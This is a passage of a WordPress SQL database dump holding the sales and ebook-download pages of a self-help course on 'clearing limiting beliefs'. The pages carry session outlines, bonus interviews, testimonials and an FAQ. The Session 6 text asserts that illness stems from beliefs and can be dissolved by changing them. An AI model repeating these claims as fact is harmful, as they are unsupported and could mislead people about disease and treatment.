/></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-05-12 13:21:16', '2015-05-12 18:21:16', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2175, 2, '2015-05-12 17:56:14', '2015-05-12 22:56:14', '&nbsp;\r\n<center><p style="text-align: left;">  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2.png">                                                              <img class="size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" /></a></center></p>\r\n\r\n<h1 style="text-align: center;"> Here''s your eBook in PDF format:</h1>\r\n<p style="text-align: center;"><strong>Click the link below to open the eBook</strong></p>\r\n<p style="text-align: center;"><strong>or right-click and "Save As..." to your computer:</strong></p>\r\n\r\n<h1 style="text-align: center;"> <a href="http://s3-us-west-2.amazonaws.com/cyb/Clear Your Beliefs eBook V6 2018.pdf">Clear Your Beliefs eBook v.4.0</a></h1>', 'CYB-eBook', '', 'inherit', 'open', 'open', '', '2061-revision-v1', '', '', '2015-05-12 17:56:14', '2015-05-12 22:56:14', '', 2061, 'http://clearyourbeliefs.com/2061-revision-v1/', 0, 'revision', '', 0),
(2177, 2, '2015-05-12 17:57:32', '2015-05-12 22:57:32', '&nbsp;\r\n\r\n<center>\r\n<p style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2.png"><img class="size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" /></a></p>\r\n\r\n</center>\r\n<h1 style="text-align: center;"> Here''s your eBook in PDF format:</h1>\r\n<p style="text-align: center;"><strong>Click the link below to open the eBook</strong></p>\r\n<p style="text-align: center;"><strong>or right-click and "Save As..." to your computer:</strong></p>\r\n\r\n<h1 style="text-align: center;"> <a href="http://s3-us-west-2.amazonaws.com/cyb/Clear Your Beliefs eBook V6 2018.pdf">Clear Your Beliefs eBook v.4.0</a></h1>', 'CYB-eBook', '', 'inherit', 'open', 'open', '', '2061-revision-v1', '', '', '2015-05-12 17:57:32', '2015-05-12 22:57:32', '', 2061, 'http://clearyourbeliefs.com/2061-revision-v1/', 0, 'revision', '', 0),
(2176, 2, '2015-05-12 17:56:44', '2015-05-12 22:56:44', '&nbsp;\r\n<center><p style="text-align: center;">  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2.png">                                                              <img class="size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" /></a></center></p>\r\n\r\n<h1 style="text-align: center;"> Here''s your eBook in PDF format:</h1>\r\n<p style="text-align: center;"><strong>Click the link below to open the eBook</strong></p>\r\n<p style="text-align: center;"><strong>or right-click and "Save As..." to your computer:</strong></p>\r\n\r\n<h1 style="text-align: center;"> <a href="http://s3-us-west-2.amazonaws.com/cyb/Clear Your Beliefs eBook V6 2018.pdf">Clear Your Beliefs eBook v.4.0</a></h1>', 'CYB-eBook', '', 'inherit', 'open', 'open', '', '2061-revision-v1', '', '', '2015-05-12 17:56:44', '2015-05-12 22:56:44', '', 2061, 'http://clearyourbeliefs.com/2061-revision-v1/', 0, 'revision', '', 0),
(2178, 2, '2015-05-12 17:58:07', '2015-05-12 22:58:07', '<p>&nbsp;</p>\r\n<p><center></p>\r\n<p style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2.png"><img class="size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" /></a></p>\r\n<p></center></p>\r\n<h1 style="text-align: center;"> Here''s your eBook in PDF format:</h1>\r\n<p style="text-align: center;"><strong>Click the link below to open the eBook</strong></p>\r\n<p style="text-align: center;"><strong>or right-click and "Save As..." to your computer:</strong></p>\r\n<h1 style="text-align: center;"> <a href="http://s3-us-west-2.amazonaws.com/cyb/Clear Your Beliefs eBook V6 2018.pdf">Clear Your Beliefs eBook v.4.0</a></h1>\r\n', 'CYB-eBook PROMISE', '', 'inherit', 'open', 'open', '', '2061-revision-v1', '', '', '2015-05-12 17:58:07', '2015-05-12 22:58:07', '', 2061, 'http://clearyourbeliefs.com/2061-revision-v1/', 0, 'revision', '', 0),
(2179, 2, '2015-05-12 17:59:30', '2015-05-12 22:59:30', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" /><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center></h1>\r\n\r\n<center><iframe src="https://player.vimeo.com/video/127646104" width="500" height="281" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></center>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can 